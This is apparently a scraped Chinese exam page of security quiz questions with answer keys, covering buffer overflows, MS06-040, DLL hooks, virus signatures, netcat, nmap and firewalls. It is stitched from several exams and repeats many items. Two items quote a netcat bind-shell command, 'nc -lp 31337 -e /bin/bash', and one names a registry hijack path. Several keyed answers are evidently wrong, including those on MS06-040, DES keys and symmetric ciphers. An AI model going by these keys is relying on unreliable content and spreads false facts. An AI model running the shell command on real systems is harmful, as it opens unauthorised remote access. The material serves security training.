B、 XueTr.exe
C、 WinHex
标准答案: B
27、当返回地址被覆盖时,新地址无效,main函数执行完后会执行什么指令?
A、 重新请求
B、 重新返回
C、 重新覆盖
D、 以上都不是
标准答案: D
28、视频中,当main函数执行完毕的时候,esp的值会发生什么变化?
A、 需认为设定为请求地址
B、 需认为设定为返回地址
C、 自动变成返回地址的下一个位置
D、 自动变成返回地址
标准答案: C
29、课程中,在0x00401005的地址处,再次利用什么功能,能够找到调用main函数的位置了?
A、 平行引用
B、 交叉引用
C、 跳位引用
D、 覆盖引用
标准答案: B
30、缓冲区溢出漏洞的原理,它就是因为我们输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了
A、 对
B、 错
标准答案: A
31、这样当CALL执行完后,程序再将该地址出栈,这样就能够知道下一步应该执行哪条指令,该地址称为?
A、 请求地址
B、 返回地址
C、 重复地址
D、 目标地址
标准答案: B
32、关于编写MessageBox()的调用过程中,下列说法错误的是?
A、 MessageBox()这个函数编写过程中,需要包含4个参数
B、 MessageBox()这个函数这个ApI函数包含有四个参数,其中可以给第一和第四个参数赋给0值
C、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为十六进制
D、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为ASCII码
标准答案: C
33、下列说法错误的是?
A、 MessageBoxA这个函数,它位于user32.dll
B、 所有的Win32程序都会自动加载kernel32.dll
C、 为了正常退出程序,还需要使用ExitProcess
D、 为了显示对话框,需要ExitProcess使用这个函数
标准答案: D
34、0x0012FFFF为系统默认的栈的底端
A、 对
B、 错
标准答案: A
35、关于W32Dasm的说法正确的是?
A、 W32Dasm是一款逆向分析软件,是一款比IDA Pro更为流行的软件
B、 W32Dasm是一款逆向分析软件,被誉为破解界的“屠龙刀”
C、 W32Dasm是一款逆向分析软件,因此其本身是不存在任何漏洞的
D、 W32Dasm这款逆向分析工具,但不是一个静态反汇编工具。
标准答案: B
36、MS06-040漏洞指的是?
A、 远程代码执行漏洞
B、 NetpwPathCanonicalize()函数存在着缓冲区溢出的缺陷
C、 心脏滴血漏洞
D、 远程桌面执行漏洞
标准答案: D
37、课程中的程序对字符串的长度限定是unicode的0x411个字符,也就是多少个字节?
A、 0x822
B、 0x823
C、 0x722
D、 2的36次方
标准答案: A
38、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。
A、 对
B、 错
标准答案: A
39、(课程中,删掉)ecx中保存的是哪的地址?
A、 缓冲区结束位置的地址
B、 缓冲区中间位置的地址
C、 缓冲区起始位置的地址
D、 没有任何地址
标准答案: C
40、函数CanonicalizePathName()是不能够被直接调用的。
A、 对
B、 错
标准答案: A
41、Winamp是一款什么软件?
A、 Winamp是一款用于研究栈溢出的软件
B、 Winamp是一款音乐播放软件
C、 Winamp是一款视频播放软件
D、 Winamp是一款用于研究代码漏洞的软件
标准答案: B
42、whatsnew.txt文件位于Winamp文件夹中,保存内容是
A、 软件的更新历史信息
B、 软件的日志信息
C、 软件的备忘信息
D、 软件的回收信息
标准答案: A
43、视频中程序程序使用的是call esp的方法,那么esp所保存的地址是?
A、 0x00BDEDF0
B、 0x00BDEDE0
C、 0x00BDEDE4
D、 0x00BDEDE8
标准答案: D
44、以下哪种情况会造成整数溢出?
A、 inputTest:65535 ,outputTest:65535
B、 inputTest:65539,outputTest:65539
C、 inputTest:65536,outputTest:1
D、 inputTest:65537,outputTest:1
标准答案: D
45、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。
A、 对
B、 错
标准答案: B
46、下列说法错误的是?
A、 无符号整数的下溢和上溢过程会触发安全性
B、 符号问题会触发安全性
C、 在高位数的整数复制到低位数的整数的时候会触发安全性
D、 整数在内存里面保存在一个固定长度的空间内,它能存储的最大值就是不固定
标准答案: D
47、函数sub_40366F一共有几个局部变量,几个参数?
A、 7,0
B、 7,4
C、 7,9
D、 4,7
标准答案: B
48、当代码接下来执行到0x004017BC的位置,会发现改代码的功能是?
A、 循环
B、 覆盖
C、 赋值
D、 清除
标准答案: A
49、krnln.fnr这个文件是加了壳,通过什么定律可以进行脱壳?
A、 ESP定律
B、 CALL定律
C、 main定律
D、 0x02定律
标准答案: A
50、 API函数都保存在操作系统提供的什么文件中?
A、 esp
B、 dat
C、 DLL
D、 exe
标准答案: C
1
首页 课程中心 考试中心 测验日志 帮助中心
考试记录 > 查看考题
民航竞赛-客户端安全3
考试时间:2018-08-01 23:00:00–2018-08-01 23:30:00 考试内容:全部
考试说明:民航竞赛-客户端安全3
一、单项选择题
1、这样当CALL执行完后,程序再将该地址出栈,这样就能够知道下一步应该执行哪条指令,该地址称为?
A、 请求地址
B、 返回地址
C、 重复地址
D、 目标地址
标准答案: B
2、关于编写MessageBox()的调用过程中,下列说法错误的是?
A、 MessageBox()这个函数编写过程中,需要包含4个参数
B、 MessageBox()这个函数这个ApI函数包含有四个参数,其中可以给第一和第四个参数赋给0值
C、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为十六进制
D、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为ASCII码
标准答案: C
3、下列说法错误的是?
A、 MessageBoxA这个函数,它位于user32.dll
B、 所有的Win32程序都会自动加载kernel32.dll
C、 为了正常退出程序,还需要使用ExitProcess
D、 为了显示对话框,需要ExitProcess使用这个函数
标准答案: D
4、0x0012FFFF为系统默认的栈的底端
A、 对
B、 错
标准答案: A
5、关于W32Dasm的说法正确的是?
A、 W32Dasm是一款逆向分析软件,是一款比IDA Pro更为流行的软件
B、 W32Dasm是一款逆向分析软件,被誉为破解界的“屠龙刀”
C、 W32Dasm是一款逆向分析软件,因此其本身是不存在任何漏洞的
D、 W32Dasm这款逆向分析工具,但不是一个静态反汇编工具。
标准答案: B
6、MS06-040漏洞指的是?
A、 远程代码执行漏洞
B、 NetpwPathCanonicalize()函数存在着缓冲区溢出的缺陷
C、 心脏滴血漏洞
D、 远程桌面执行漏洞
标准答案: D
7、课程中的程序对字符串的长度限定是unicode的0x411个字符,也就是多少个字节?
A、 0x822
B、 0x823
C、 0x722
D、 2的36次方
标准答案: A
8、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。
A、 对
B、 错
标准答案: A
9、(课程中,删掉)ecx中保存的是哪的地址?
A、 缓冲区结束位置的地址
B、 缓冲区中间位置的地址
C、 缓冲区起始位置的地址
D、 没有任何地址
标准答案: C
10、函数CanonicalizePathName()是不能够被直接调用的。
A、 对
B、 错
标准答案: A
11、Winamp是一款什么软件?
A、 Winamp是一款用于研究栈溢出的软件
B、 Winamp是一款音乐播放软件
C、 Winamp是一款视频播放软件
D、 Winamp是一款用于研究代码漏洞的软件
标准答案: B
12、whatsnew.txt文件位于Winamp文件夹中,保存内容是
A、 软件的更新历史信息
B、 软件的日志信息
C、 软件的备忘信息
D、 软件的回收信息
标准答案: A
13、视频中程序程序使用的是call esp的方法,那么esp所保存的地址是?
A、 0x00BDEDF0
B、 0x00BDEDE0
C、 0x00BDEDE4
D、 0x00BDEDE8
标准答案: D
14、以下哪种情况会造成整数溢出?
A、 inputTest:65535 ,outputTest:65535
B、 inputTest:65539,outputTest:65539
C、 inputTest:65536,outputTest:1
D、 inputTest:65537,outputTest:1
标准答案: D
15、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。
A、 对
B、 错
标准答案: B
16、下列说法错误的是?
A、 无符号整数的下溢和上溢过程会触发安全性
B、 符号问题会触发安全性
C、 在高位数的整数复制到低位数的整数的时候会触发安全性
D、 整数在内存里面保存在一个固定长度的空间内,它能存储的最大值就是不固定
标准答案: D
17、函数sub_40366F一共有几个局部变量,几个参数?
A、 7,0
B、 7,4
C、 7,9
D、 4,7
标准答案: B
18、当代码接下来执行到0x004017BC的位置,会发现改代码的功能是?
A、 循环
B、 覆盖
C、 赋值
D、 清除
标准答案: A
19、krnln.fnr这个文件是加了壳,通过什么定律可以进行脱壳?
A、 ESP定律
B、 CALL定律
C、 main定律
D、 0x02定律
标准答案: A
20、 API函数都保存在操作系统提供的什么文件中?
A、 esp
B、 dat
C、 DLL
D、 exe
标准答案: C
21、在操作系统中安装全局钩子以后,只要目标进程符合我们所设定的条件,全局钩子的DLL文件会被操作系统自动或强行地加载到该进程中。
A、 对
B、 错
标准答案: A
22、“开启监控”按钮的功能是首先需要获取欲注入的DLL程序的完整路径,也就是当前目录。
A、 对
B、 错
标准答案: A
23、关闭监控”按钮的功能是查找explorer.exe进程中是否含有我们所注入的什么文件?
A、 kernel32.dll
B、 CreateProcessHook.dll
C、 HookCreateProcess.dll
D、 LoadLibraryA.dll
标准答案: C
24、因为程序使用了getcwd()函数获取当前路径,所以需要添加头文件direct.h,而为了实现进程的遍历,但不需要包含头文件Tlhelp32.h。
A、 对
B、 错
标准答案: B
25、CRC32查杀方式比传统的查杀方式的查杀效率高一些。
A、 对
B、 错
标准答案: B
26、熊猫病毒特征码的字节是多少个字节?
A、 32
B、 33
C、 16
D、 24
标准答案: A
27、U盘病毒的文件偏移是?
A、 0x192
B、 x1920
C、 0x1920
D、 0x190
标准答案: C
28、如果计算机已经中了病毒,现在我们拥有了该病毒的特征码,那么我们能否修复该病毒给计算机造成的危害。
A、 对
B、 错
标准答案: B
29、有些病毒为了实现网站劫持,使其重定向到自己指定的地址,那么为了达到这一目的,通常做法是Windows系统里位于%SystemRoot%\system32\drivers目录下的hosts文件。
A、 对
B、 错
标准答案: B
30、无论程序是用C#,还是C++,或是VB编写,最终都被编译为.NET的中间语言IL。
A、 对
B、 错
标准答案: A
31、计算机病毒的会造成哪些危害?
A、 磁盘破坏
B、 计算机用户的伤害
C、 CPU的损坏
D、 程序和数据的破坏
标准答案: D
32、在Windows 32 位操作系统中,其EXE文件中的特殊表示为?
A、 MZ
B、 PE
C、 NE
D、 LE
标准答案: B
33、能够感染EXE、COM 文件的病毒属于?
A、 网络型病毒
B、 蠕虫型病毒
C、 文件型病毒
D、 系统引导型病毒
标准答案: C
34、下列描述不正确的是?
A、 不存在能够防治未来的所有病毒的发病毒软、硬件
B、 现在的杀毒软件能够查杀未知病毒
C、 病毒产生在前,反病毒手段相对滞后
D、 数据备份是防治数据丢失的重要手段
标准答案: B
35、下列预防计算机病毒的注意事项中,错误的是?
A、 不使用网络,以免中毒
B、 重要资料经常备份
C、 备好启动盘
D、 尽量避免在无防毒软件机器上使用可移动储存介质
标准答案: A
36、什么是敲竹杠病毒?
A、 对电脑设置开机密码类,再提供密码索要费用的木马病毒
B、 盗取数据信息的病毒
C、 破坏计算机运行的病毒
D、 伪装监控病毒
标准答案: A
37、在OD工具调试中,JE跳转不成立,不改变病毒运行顺序的情况下,可以把ZF标志位修改为1。
A、 对
B、 错
标准答案: A
38、EAX寄存器保存的是操作字符串的地址信息。
A、 对
B、 错
标准答案: A
39、病毒屏蔽杀毒软件后可以用改文件名的方法来进行绕过。
A、 对
B、 错
标准答案: A
40、注册表映像劫持的路径是?
A、 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
B、 HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
C、 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
D、 HKCU\Software\Microsoft\Windows\CurrentVersion\Run
标准答案: C
41、CreateToolhelp32Snapshot函数解析正确的是?
A、 检索系统快照中遇到的第一个进程的信息
B、 搜索一个文件或子目录名匹配一个特定名称的目录
C、 获取进程信息为指定的进程、进程使用的堆、线程建立一个快照
D、 函数终止指定进程及其所有线程
标准答案: C
42、每个函数都有自己的栈帧,每个函数都是利用自己的栈帧空间保存全局变量与函数的调用关系。()
A、 对
B、 错
标准答案: B
43、如果能控制进程的执行流程,不能够执行想要执行的指令,达到我们目的的指令序列就叫做shellcode。()
A、 对
B、 错
标准答案: B
44、下面是漏洞代码,分析的结果:创建一个ba数组,将ba内容加密,修改ba内容,为ba解密。()
A、 对
B、 错
标准答案: B
45、缓冲区溢出漏洞的原理,它就是因为我们输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了
A、 对
B、 错
标准答案: A
46、0x0012FFFF为系统默认的栈的底端
A、 对
B、 错
标准答案: A
47、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。
A、 对
B、 错
标准答案: A
48、函数CanonicalizePathName()是不能够被直接调用的。
A、 对
B、 错
标准答案: A
49、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。
A、 对
B、 错
标准答案: B
50、在操作系统中安装全局钩子以后,只要目标进程符合我们所设定的条件,全局钩子的DLL文件会被操作系统自动或强行地加载到该进程中。
A、 对
B、 错
标准答案: A
1、下列哪项不是信息安全的定义?
A、 数据安全,确保数据不会被非法入侵者读取或破坏
B、 程序安全,重视软件开发过程的品质及维护
C、 系统安全,维护计算机系统正常操作
D、 环境安全,管理员不能用弱口令
标准答案: D
2、下列哪项不是正确的防止被骗操作?
A、 在淘宝购买东西应该使用旺旺交流
B、 商家发送的发票文件,直接打开
C、 商品多次修改价格,应该提高警惕
D、 对商家发送的文件进行查杀
标准答案: B
3、下列选项中对DES加密算法描述不正确的是?
A、 以64位为分组对数据进行加密
B、 其密钥长度为56位
C、 运用相同算法进行加密解密
D、 DES加密算法为最安全的加密算法之一
标准答案: D
4、下列关于标准防火墙的描述错误的是?
A、 防火墙安全规则遵循从上到下匹配原则,一旦有一条匹配,剩余的规则就不匹配了
B、 所有的规则都没有匹配到,数据包将丢弃
C、 安全过滤规则主要包含源、目的地址和端口
D、 防火墙的主要功能是防止病毒等恶意程序的传输
标准答案: D
5、对于“access-list 101 primit tcp any host 198.78.46.8 eq www”的acl规则理解正确的是?
A、 匹配顺序为101,允许ip为198.78.46.8的主机访问任何外部ip
B、 规则强度为101,不允许TCP连接,禁止所有主机对198.78.46.8的www服务进行访问
C、 匹配顺序为101,允许TCP连接,所有主机对198.78.46.8的www服务进行访问
D、 匹配顺序为101,允许TCP连接,禁止禁止所有主机对198.78.46.8的www服务进行访问
标准答案: C
6、下列那些SMTP命令是用来发送邮件的Envelop的?
A、 HELO xxx.com
B、 MAIL FROM :<>和RCPT TO:<>
C、 DATA
D、 AUTH LOGIN
标准答案: B
7、下列关于信息安全保障的描述错误的是?
A、 信息安全保障的是核心业务,信息安全保障是为了支撑业务的正常运行
B、 信息系统安全的保障是在整个信息系统的生命周期中
C、 要确保信息系统的保密性、完整性、和可用性
D、 信息安全保障策略的制定没办法考虑到地震、海啸等大自然的不可抗力
标准答案: D
8、下列对于下一代防火墙的描述错误的是?
A、 将访问控制对象从网络层、传输层延伸到应用层
B、 下一代防火墙能够识别应用和内容
C、 下一代防火墙可以限制用户是否能在上班时间访问娱乐社交软件
D、 下一代防火墙已经丢弃了传统防火墙的工作模式
标准答案: D
9、下列关于KDC的描述错误的是?
A、 KDC是秘钥分发中心
B、 网络中所有客户机和服务器都信任KDC,并使用KDC验证用户身份
C、 KDC是由认证服务和票据授予服务组成
D、 认证服务的作用主要是生成两个主题之间通信的票据
标准答案: D
10、下列哪项不是防火墙常见的工作方式?
A、 包过滤
B、 状态监测
C、 透明接入
D、 应用代理
标准答案: C
11、下列选项中关于ACL规则的匹配原则描述不正确的是?
A、 防火墙安全规则遵循从上到下匹配的原则
B、 如果所有的规则都没有匹配到,数据包将被丢弃
C、 安全过滤规则只包含源、目的地址和端口
D、 防火墙安全规则匹配时一旦有一条匹配,剩余的都不再进行匹配
标准答案: C
12、下列选项中关于防火墙的透明部署方式描述错误的是?
A、 内外网在一个网段内
B、 优点是直接串联到链路上,不改变原有的网络IP地址配置
C、 缺点是像玻璃一样,屋内屋外一览无余
D、 透明模式即用户可以访问到网络安全设备
标准答案: D
13、下列关于nc -lp 31337 -e /bin/bash 的理解错误的是____。
A、 打开并监听本地端口31337,等待主机连接
B、 -e 代表将/bin/bash 绑定在此端口上
C、 这是使用netcat反弹shell的命令
D、 使用的是反向连接方式反弹shell
标准答案: D
14、下列选项中最复杂的密码是____。
A、 博福特密码
B、 弗纳姆密码
C、 滚动密钥密码
D、 转轮密码
标准答案: D
15、下列关于Netcat的操作的描述错误的是____。
A、 nc -G 追踪连接可用于网络排查
B、 -o 会将显示的内容输出到一个指定文件
C、 -h 打开nc的帮助文档
D、 -l 表示打ip列表
标准答案: D
16、下列关于nc -lp 31337 -e /bin/bash 的理解错误的是____。
A、 打开并监听本地端口31337,等待主机连接
B、 -e 代表将/bin/bash 绑定在此端口上
C、 这是使用netcat反弹shell的命令
D、 使用的是反向连接方式反弹shell
标准答案: D
17、下列哪些功能不是netcat能做到的?
A、 在两台主机之间通信
B、 在两台主机之间传输文件
C、 反弹主机shell
D、 漏洞扫描以及利用
标准答案: D
18、下面对于"nc www.google.com 80"的描述错误的是?
A、 连接google.com 开放的80端口
B、 可以获取一些关于主机的信息
C、 可以发送http请求包来访问网站
D、 不会连接成功
标准答案: D
19、使用____命令检测目标主机的端口开放情况。
A、 nmap --version
B、 nmap
C、 nmap -A -v
D、 nmap -sP 192.168.0.0/24
标准答案: B
20、下列对于“nmap 10.73.31.0/24 --exclude 10.73.31.184”的理解错误的是____。
A、 nmap 10.73.31.0/24 是指扫描该IP的整个C段网络
B、 nmap 10.73.31.0/24 等于 nmap 10.73.31.*
C、 --exclude 10.73.31.184 是指 在扫描整个C段网络时 排除10.73.31.184这个IP
D、 扫描结果会包含主机操作系统信息
标准答案: D
21、只进行主机存活探测,使用____命令。
A、 nmap --version
B、 nmap
C、 nmap -A -v
D、 nmap -sP 192.168.0.0/24
标准答案: D
22、密码术中永恒的两大原则是____。
A、 替换 换位
B、 混乱 换位
C、 混乱 扩散
D、 扩散 替换
标准答案: A
23、下列关于DES算法描述不正确的是____。
A、 密钥较短
B、 加解密速度快
C、 适用于加密大量数据的场合
D、 加解密的密钥相同
标准答案: D
24、下列选项中不属于密码对信息的保护的是____。
A、 信息的传输
B、 信息的存储
C、 信息的交换
D、 信息的发布
标准答案: D
25、下列____不属于单钥体制的密码系统。
A、 代数作业体制
B、 序列密码体制
C、 堆成密码体制
D、 分组密码体制
标准答案: C